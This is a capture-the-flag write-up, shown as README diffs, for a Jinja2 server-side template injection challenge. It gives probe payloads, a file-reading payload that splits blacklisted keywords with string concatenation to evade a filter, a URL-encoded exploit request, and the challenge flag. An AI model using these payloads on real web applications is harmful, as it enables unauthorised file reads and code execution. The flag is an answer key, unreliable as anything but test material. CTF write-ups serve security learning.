aadityapurani · April 8, 2018 17:10 · Apr 8, 2018 · Apr 8, 2018
diff --git a/README.md b/README.md
@@ -1,10 +1,10 @@
-# Jinja 2 RCE
+# Hard_To_Hack (Web 400) - BBCTF2018
 
 Test Condition: `{{'7'*7}}`
 Config : `{{config}}`
 Request not blocked :  `{{request}}`
 
-After successive tries, figured out class keyword was blacklisted and so did many important. But we can use + to concat two strings and use it.
+After successive tries, figured out class keyword was blacklisted and so did many important keywords. But we can use + to concat two strings and use it.
 
 General file reading payload for Jinja2 is 
 ```{{ ''.__class__.__mro__[2].__subclasses__()[40]('flag', 'r').read() }}```

diff --git a/README.md b/README.md
@@ -0,0 +1,21 @@
+# Jinja 2 RCE
+
+Test Condition: `{{'7'*7}}`
+Config : `{{config}}`
+Request not blocked :  `{{request}}`
+
+After successive tries, figured out class keyword was blacklisted and so did many important. But we can use + to concat two strings and use it.
+
+General file reading payload for Jinja2 is 
+```{{ ''.__class__.__mro__[2].__subclasses__()[40]('flag', 'r').read() }}```
+
+But some keywords were blocked. So split and profit
+
+```{{''['__cla'+'ss__']['__mr'+'o__'][2]['__subcla'+'sses__']()[40]('fl'+'ag', 'r').read()}}```
+
+This acts same as the above payload due to the property access (http://jinja.pocoo.org/docs/2.10/templates/)
+
+Hence, you send it after URL encoding
+http://web.euristica.in/hard_to_hack/index?data=%7B%7B%27%27%5B%27__cla%27%2B%27ss__%27%5D%5B%27__mr%27%2B%27o__%27%5D%5B2%5D%5B%27__subcla%27%2B%27sses__%27%5D()%5B40%5D(%27fl%27%2B%27ag%27%2C%20%27r%27).read()%7D%7D
+
+flag{BlackListing_N3Ver_H3lp3d_An40ne}